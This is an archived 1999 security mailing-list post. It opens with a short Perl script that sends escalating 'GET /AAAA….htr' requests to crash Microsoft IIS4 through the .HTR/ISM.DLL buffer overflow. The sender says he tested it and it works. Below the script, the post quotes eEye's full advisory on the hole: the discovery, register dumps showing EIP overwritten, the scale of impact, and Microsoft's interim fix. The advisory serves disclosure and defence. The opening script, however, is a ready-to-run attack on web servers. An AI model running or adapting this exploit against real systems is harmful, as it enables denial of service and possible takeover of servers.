tested, this works for me... scripting was turned on... perl exploit
code follows:
#!/usr/bin/perl
#props to the absu crew
use Net::Telnet;
for ($i=2500;$i<3500;$i++)
{
$obj=Net::Telnet->new( Host => "$ARGV[0]",Port => 80);
my $cmd = "GET /". 'A' x $i . ".htr HTTP/1.0\n";
print "$cmd\n";$obj->print("$cmd");
$obj->close;
}
/ eEye - Digital Security Team <eeyeat_private> wrote:
| Retina vs. IIS4, Round 2
|
| Systems Affected:
|
| Internet Information Server 4.0 (IIS4)
| Microsoft Windows NT 4.0 SP3 Option Pack 4
| Microsoft Windows NT 4.0 SP4 Option Pack 4
| Microsoft Windows NT 4.0 SP5 Option Pack 4
|
| Release Date:
|
| June 8, 1999
|
| Advisory Code:
|
| AD06081999
|
| Description:
|
| We have been debating how to start out this advisory. How do you explain
| that 90% or so of the Windows NT web servers on the Internet are open to a
| hole that lets an attacker execute arbitrary code on the remote web server?
| So the story starts...
|
| The Goal:
|
| Find a buffer overflow that will affect 90% of the Windows NT web servers on
| the Internet. Exploit this buffer overflow.
|
| The Theory:
|
| There will be overflows in at least one of the default IIS filtered
| extensions (i.e. .ASP, .IDC, .HTR). The way we think the exploit will take
| place is that IIS will pass the full URL to the DLL that handles the
| extension. Therefore if the ISAPI DLL does not do proper bounds checking it
| will overflow a buffer taking IIS (inetinfo.exe) with it and allow us to
| execute arbitrary code on the remote server.
|
| Entrance Retina:
|
| At the same time of working on this advisory we have been working on the AI
| mining logic for Retina's HTTP module. What better test scenario than this?
| We gave Retina a list of 10 or so extensions common to IIS and instructed it
| to find any possible holes relating to these extensions.
|
| The Grind:
|
| After about an hour Retina found what appeared to be a hole. It displayed
| that after sending "GET /[overflow].htr HTTP/1.0" it had crashed the server.
| We all crossed our fingers, started up the good ol' debugger and had Retina
| hit the server again.
|
| Note: [overflow] is 3k or so characters... but we will not get into the
| string lengths and such here. View the debug info and have a look for
| yourself.
|
| The Registers:
|
| EAX = 00F7FCC8 EBX = 00F41130
| ECX = 41414141 EDX = 77F9485A
| ESI = 00F7FCC0 EDI = 00F7FCC0
| EIP = 41414141 ESP = 00F4106C
| EBP = 00F4108C EFL = 00000246
|
| Note: Retina was using "A" (0x41 in hex) for the character to overflow with.
| If you're not familiar with buffer overflows a quick note would be that
| getting our bytes into any of the registers is a good sign, and directly
| into EIP makes it even easier :)
|
| Explain This:
|
| The overflow is in relation to the .HTR extensions. IIS includes the
| capability to allow Windows NT users to change their password via the web
| directory /iisadmpwd/. This feature is implemented as a set of .HTR files
| and the ISAPI extension file ISM.DLL. So somewhere along the line when the
| URL is passed through to ISM.DLL, proper bounds checking is not done and our
| overflow takes place. The .HTR/ISM.DLL ISAPI filter is installed by default
| on IIS4 servers. Looks like we got our 90% of the Windows NT web servers
| part down. However, can we exploit this?
|
| The Exploit:
|
| Yes. We can definitely exploit this and we have. We will not go into much
| detail here about how the buffer is exploited and such. Read the comments in
| the asm file for more information. However, one nice thing to note is that
| the exploit has been crafted in such a way to work on SP4 and SP5 machines,
| therefore there is no guessing of offsets and possible accidental crashing
| of the remote server. We have not tested the exploit on SP3 and would love
| to know if it works or not. eMail alertat_private if you've successfully
| exploited this hole on SP3.
|
| For more details about the exploit visit the eEye web site at www.eEye.com
|
| The Fallout:
|
| Almost 90% of the Windows NT web servers on the Internet are affected by
| this hole. Everyone from NASDAQ to the U.S. Army to Microsoft themselves.
| No, we did not try it on the above mentioned. But it is easy to verify if a
| web server is exploitable without using the exploit. Even a server that's
| locked in a guarded room behind a Cisco Pix can be broken into with this
| hole. This is a reminder to all software vendors that testing for common
| security holes in your software is a must. Demand more from your software
| vendors.
|
| The Request. (Well one anyway.)
|
| Dear Microsoft,
|
| One of the things that we found out is that IIS did not log any trace of our
| attempted hack. We recommend that you pass all server requests to the
| logging service before passing it to any ISAPI filters etc...The logging
| service should be, as named, an actual service running in a separate memory
| space so that when inetinfo goes down intrusion signatures are still logged.
|
| Retina vs. IIS4, Round 2. KO.
|
| Fixes:
|
| 1. Remove the extension .HTR from the ISAPI DLL list. Microsoft has just
| updated their checklist to include this interim fix.
| http://microsoft.com/security/products/iis/CheckList.asp
| 2. Apply the patch supplied by Microsoft when available.
| http://microsoft.com/security
|
| Vendor Status:
|
| We contacted Microsoft on June 8th 1999, eEye Digital Security Team provided
| all information needed to reproduce the exploit. and how to fix it.
| Microsoft security team did confirm the exploit and are releasing a patch
| for IIS.
|
| Related Links
|
| Advisory - On our web site
| http://www.eEye.com/database/advisories/ad06081999/ad06081999.html
|
| Advisory - Retina Brain File used to uncover the hole
| http://www.eEye.com/database/advisories/ad06081999/ad06081999-brain.html
|
| Retina - The Network Security Scanner
| http://www.eEye.com/retina/
|
|
| Greetings go out to:
|
| The former Secure Networks Inc., L0pht, Phrack, ADM, Rhino9, Attrition, HNN
| and any other security company or organization that believes in full
| disclosure.
|
| Copyright (c) 1999 eEye Digital Security Team
|
| Permission is hereby granted for the redistribution of this alert
| electronically. It is not to be edited in any way without express consent of
| eEye. If you wish to reprint the whole or any part of this alert in any
| other medium excluding electronic medium, please e-mail alertat_private for
| permission.
|
| Disclaimer:
|
| The information within this paper may change without notice. Use of this
| information constitutes acceptance for use in an AS IS condition. There are
| NO warranties with regard to this information. In no event shall the author
| be liable for any damages whatsoever arising out of or in connection with
| the use or spread of this information. Any use of this information is at the
| user's own risk.
|
| Please send suggestions, updates, and comments to:
|
| eEye Digital Security Team
|
| infoat_private
| www.eEye.com
|
|
--
----------------------------------------------------------------
Ryan R Permeh E-MAIL: rrpermehat_private
IS Engineer WEB : http://www.rconnect.com
Rural Connections HELP : helpat_private
FAQ : http://www.rconnect.com/help
SALES : salesat_private
----------------------------------------------------------------
120 First Street NE PHONE : (507) 281-5005
Rochester, MN 55906 FAX : (507) 281-9272
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGP for Personal Privacy 5.5.2
mQGiBDcgdWARBADnxcSfGnU0uzDZM95Rw9bXhcCeGut0mhB45TOPvi+dxqC1D4Fi
a8WusSx+wMg6YvsNoYfUAZH7EGLFFUwmEQRiU1gLZsUZztKGIQZXnTxfkD3sZmDa
QMZ+Li8vLrcnSA0wMVjeoHmmlGDh6P10AdqgeXrkvjpVLe9XNUE+qF1eNwCg/1Od
OXKodgatoLW8Su4gNhR86qMD/1LVlPfESc9Ojgi+kQb2KK1q+49Yk4nRa/0JxT8/
HkT0r9a9Yn21B1rMmvXruQHbqWmMQFhWNbsA3cHB9ggBfk5MntnQthJHQn0BRDRp
TaQl77b8uftW9h6d1Z4mwbSMkb+ZjaOPGwrrTt9NnSbspdjyluw84rvOKtB8E8uS
TajABACL6aH5J9rurP/tmLsVXvk4Fpvb9nAENyu+1AJwm05+mpxf+mejkvYAQNRV
PsOjIdXVgGEZoJxdYNGtJSF4ukHo2kfwJwLR4+UgbO49d+Fuu0mylmiOlrjpFljF
d947Zuggv5mCPQPeJ9QlmmLGo1HUwEAn7sOEedXDLZ4e17wo97QjUnlhbiBQZXJt
ZWggPHJycGVybWVoQHJjb25uZWN0LmNvbT6JAEsEEBECAAsFAjcgdWAECwMCAQAK
CRDZLKC1ZGph5sYIAKDYq6eFSE4oFTIAyuOtcc2PxmdrbQCg3Hjv2cydFHwR+I5S
5g+VCQjo8vq5Ag0ENyB1YBAIAPZCV7cIfwgXcqK61qlC8wXo+VMROU+28W65Szgg
2gGnVqMU6Y9AVfPQB8bLQ6mUrfdMZIZJ+AyDvWXpF9Sh01D49Vlf3HZSTz09jdvO
meFXklnN/biudE/F/Ha8g8VHMGHOfMlm/xX5u/2RXscBqtNbno2gpXI61Brwv0YA
WCvl9Ij9WE5J280gtJ3kkQc2azNsOA1FHQ98iLMcfFstjvbzySPAQ/ClWxiNjrtV
jLhdONM0/XwXV0OjHRhs3jMhLLUq/zzhsSlAGBGNfISnCnLWhsQDGcgHKXrKlQzZ
lp+r0ApQmwJG0wg9ZqRdQZ+cfL2JSyIZJrqrol7DVekyCzsAAgIIALjRqRKSXFjt
MgpciCFucMc+PLZG9nkfHJHWawm/ZJLW99qmBjRF67SDLN9p2b8ZPgVKVtS6udwP
j5E25JQIgS137FZ8hpyEorXyYXHbnN3Wt7Wg6auJY4NOJVKePx2TWjCMgpgXCuf0
Z0+aYXYB/KG52sj0P0l/m5QjE35ftPJHnALoHjYwRcdPty3FTG3XT9+ctsl0PKSP
983KxkyFNuNFhZBUyxATUhAbosHDBOew2eoBf6xXMAs4b27ljGrisIttX5h5N3PO
PqBOwPuL24DqY56borp+jx3+1Ux1FL9sNqxH+AD4aRBYrllyLy5wZS37YgP671Hh
vA6NTSWnW0iJAEYEGBECAAYFAjcgdWAACgkQ2SygtWRqYeY0BQCcCh+xJQbiUHsB
JHM9Gml2lBmLMB4AmwT11BegWTahprjZFp1wAD4+6uKo
=pGLY
-----END PGP PUBLIC KEY BLOCK-----
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:49:33 PDT